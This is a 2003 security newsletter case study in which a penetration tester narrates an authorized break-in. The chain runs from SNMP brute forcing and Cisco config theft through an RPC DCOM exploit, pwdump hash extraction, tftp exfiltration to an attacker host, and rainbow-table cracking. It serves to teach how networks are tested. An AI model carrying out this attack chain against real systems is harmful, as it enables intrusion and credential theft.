SecurityProNews Home PageAbout iEntryArticle ArchiveNewsWebProWorld ForumsJaydeiEntryContactAdvertiseDownloadsiEntry
Click Here - for a FREE White Paper

A White Hat's Penetration Test

By Mati Aharoni

This tutorial is more of a “case study”, in which I describe a recent penetration test I performed. Due to the success of the penetration test (in a relatively very short time) I decided to share this experience with you.

Please note that all identifying details such as IP addresses and hostnames have been changed, to protect the vulnerable and innocent.

I would like to thank my anonymous client for allowing me to write up and publish this article.

Chain of Events:
1:20 am
I sit down in front of my screen, with a fresh cup of coffee. My goal is to remotely penetrate, at their request, of course. The only prior information I have, is their domain name –

1:22 am
I decide to start out with a bit of DNS enumeration, in order to identify's gateway routers / computers, and get a general idea about what kind of network they have. I use 'nslookup' to do this.

Gentoo Tools # nslookup

Note: nslookup is deprecated and may be removed from future releases.

Consider using the `dig' or `host' programs instead. Run nslookup with

the `-sil[ent]' option to prevent this message from appearing.
> set type=ns




Non-authoritative answer: nameserver = nameserver =

Authoritative answers can be found from: internet address = internet address =

> set type=mx



Address: mail exchanger = 10 mail exchanger = 0


Nslookup suggests that's dns records are managed by their ISP, which minimizes the probability of a successful DNS zone transfer.

Get LinuxProNews Newsletter Free - ">Click Here

I attempt to identify's mail server, which ends up being “” (at cost 0). This suggests that host their own mail server, on site.

1:30 am
I run nmap on, and find a variety of services running on it.

Gentoo Tools # nmap -sS

Starting nmap 3.45 ( ) at 2003-10-19 19:40 IST

Interesting ports on (

(The 1644 ports scanned but not shown below are in state: closed)


23/tcp open telnet

25/tcp open smtp

79/tcp open finger

80/tcp open http

110/tcp open pop-3

143/tcp open imap

Nmap run completed -- 1 IP address (1 host up) scanned in 26.304 seconds

Gentoo Tools #

“Strange” I think to myself. “A Mail server running 'Finger' service?”. I run a quick UDP scan.

Search Engine Strategies Forum
WebProWorldVisit the WebProWorld Search Engine Strategies Forum for the latest information on search engine marketing.

On The Scene Forum
Gentoo Tools # nmap -sU -p 161-162

Starting nmap 3.45 ( ) at 2003-10-19 19:48 IST>

Interesting ports on ( >


161/udp open snmp>

162/udp closed snmptrap>

Nmap run completed -- 1 IP address (1 host up) scanned in 2.119 seconds>

Gentoo Tools #

“Hmm, SNMP is enabled...Could this be a router?”.

A quick telnet command to verifies my suspicions.

I immediately recognize the Cisco Telnet banner.

Gentoo Tools # nc -v 23 [] 23 (telnet) open


User Access Verification


Gentoo Tools #

Apparently, is a router, PAT'ing ports into Internal Server(s) (Pop3, Http, Imap).

My next action is to attempt to identify the router, hoping it really is a Cisco. This can be done with SNMP – and Phillip Waytaens' SNMPEnum would do the job perfectly. The following is a shortened output of SNMPEnum:

Gentoo snmp # perl -w public cisco.txt




Cisco Internetwork Operating System Software

IOS (tm) Software, Version 12.0(5)T, RELEASE SOFTWARE

Copyright (c) 1986-1999 by cisco Systems, Inc.

Compiled Thu 23-Jul-99 13:14 by C

Gentoo snmp #

I use the SNMPEnum script, assuming that the SNMP public community string is “public” (As SNMP is often misconfigured). Fortunately for me, this assumption is correct – However, the “read” community string has been changed.

I whip out my favorite SNMP community string bruteforce tool (Solarwinds SNMP Dictionary attack), and start pounding at the router, with my favorite dictionary file.

After a (long) while, I see the good news I was hoping for. I finally have the read-write community string. This would probably allow me to download the router's configuration (SNMP allows this). A quick turn with the modified “snmpbrute”, and I tftp the router configuration file straight to my attacking machine.

1:55 am
Doing the “Wild Indian rain dance”. I go to the kitchen for some more coffee.

1:58 am
I start looking at the cisco configuration file. It seems that the login and enable passwords are the same. I use a perl script to decrypt the “type 7” cisco encryption. The password turns out to be “therouter”.

Current configuration:
version 12.2
no service pad
enable password 7 0958460C0B0A02060E1E
transport input none
stopbits 1
line vty 0 4
password 7 0958460C0B0A02060E1E

A deeper look into the router's configuration file, reveals their Internal mail / web server's internal address –

The following is part of the Cisco configuration file that NAT's the ports from the router, to the internal mail/web server :


ip nat inside source static tcp 143 143 extendable

ip nat inside source static tcp 80 80 extendable

ip nat inside source static tcp 110 110 extendable

ip nat inside source static tcp 25 25 extendable


2:30 am
I sip my cold coffee, and start profiling the information I have up to now. In the backround, I verify that their internal server is indeed running windows 2000.

Gentoo# nc -n 80

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 29 Oct 2003 20:09:02 GMT
Content-Type: text/html
Content-Length: 87

Gentoo# nc -n 110

+OK Microsoft Exchange 2000 POP3 server version 6.0.6249.0 ( ready.


“Their internal server is most probably running Windows 2000. What are the chances that feels secure – thinking that they are protected by their router? What are the chances they havn't patched their internal servers against some major vulnerabilities?” I decided to give it a shot.

2:38 am
My first choice is to attempt to use the rpc dcom exploit on their internal server, but in order to do this, I have to open up a few more ports on the router, and direct them to the internal mail / web server.

Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.

Router(config)#ip nat inside source static tcp 139 139 extendable

Router(config)#ip nat inside source static tcp 135 135 extendable

Router(config)#ip nat inside source static tcp 445 445 extendable

Router(config)#ip nat inside source static tcp 3389 3389 extendable

Router(config)#ip nat inside source static tcp 10000 10000 extendable

While I'm at it, I'll open up all Netbios ports (for later SMB enumeration), and terminal services (I'm feeling lucky). I also open port 10000, knowing i'll need to open an extra port in order to connect my shell to the internal server.

I whip out my exploit toolkit (framework) and send the RPC Dcom exploit to the router, knowing that the exploit would be redirected to the internal server due to my recent NAT modificationson the router.

Gentoo # ./cli exp/msrpc_dcom1_overflow.exp payload=winbind lport=10000 OS=2K E

[*] Generating payload winbind (x86, win32, bind)...

[*] Payload generation complete (668 bytes)

[*] Using return address 0x77838eef with scratch pad at 0x7ffde0cc

[*] Connected to

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.


3:01 am
Time for more coffee. It seems that my assumption paid off, this company has NOT patched their internal servers, due to a false sense of security. I now have SYSTEM privilages on their web / mail server.
I quickly upload pwdump4.exe in order to dump the password hashes to a files, for later, local cracking.

Once the hashes are dumped to a file, I tftp this file from their internal webserver back to my attacking machine.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>tftp -i my.attacking.ip GET pwdump4.exe

C:\WINNT\system32>pwdump4.exe \\ >

C:\WINNT\system32>tftp -i my.attacking.ip PUT


Usually, I'd use 'john the ripper' to crack these password hashes, however, I recently finished generating rainbow-crack's hash tables, and I thought i'de give it a try.

D:\TOOLS\password\RTGEN>rcrack.exe *.rt -f hash.txt

reading lm_alpha-numeric_0_2400x40000000_bla.rt ...

315498496 bytes read, disk access time: 17.49 s

verifying the file ...

searching for 29 hashes ...

plaintext of df168b2dd34bad07 is ***

plaintext of ac59766adf048863 is ***




plaintext found: 24 of 29 (82.76%)

total disk access time: 155.57 s

total cryptanalysis time: 428.81 s

total chain walk step: 151943227

total false alarm: 66931

total false alarm step: 56200430

username password


Administrator T3L3PITA


Anat REUVEN101



Rainbow-crack proved to be an invaluable tool, and shortened the whole process of NTLM hash cracking to less than 10 minuets. Using john the ripper, this could have taken anywhere from one week to a couple of months.

3:30 am
Once the administrator password is found, I attempt to connect to port 3389 on – hoping that per-chance terminal services is enabled. It seems that lady luck was is my favor – and I receive a terminal services window. Using the cracked Administrator password, I log into the the web server – Mission completed.

3:37 am
To completely consolidate my control of the client's network, I upload a modified version of KaHT II (the RPC DCOM autohacker) and edit the macros.txt file, so that each successful exploitation would tftp the 'repair' sam file to my attacking machine.

At this stage, I stop my attack on the client's network, as the contract objectives are completed.

3:57 am
I take one last sip - What would I do without my coffee?

About the Author:
Visit the Security through Hacking Web site at for additional information.

Read this newsletter at:

Free Newsletters
Part of the iEntry Network
over 4 million subscribers

Send me relevant info on products and services.

From the Forum:
Hackers haunting Europe now

... Hackers, it appears, are now forsaking North America in favour of European targets.

In November, said a report from British Internet security specialists at mi2g, Europe overtook North America as the most attacked continent in cyberspace.

Moreover, the successful hacking and distributed denial of service attacks now originate from Brazil, Russia, China and India, the mi2g Intelligence Unit reported in new research. Turkey, Indonesia, Morocco, Pakistan, Kuwait and Saudi Arabia are also increasingly active.

Successful digital attacks against North America have been dwindling quickly over the past three months. ...

Click here

-- SecurityProNews is an iEntry, Inc. publication --
2003 iEntry, Inc.  All Rights Reserved  Privacy Policy  Legal

archives | advertising info | news headlines | free newsletters | comments/feedback | submit article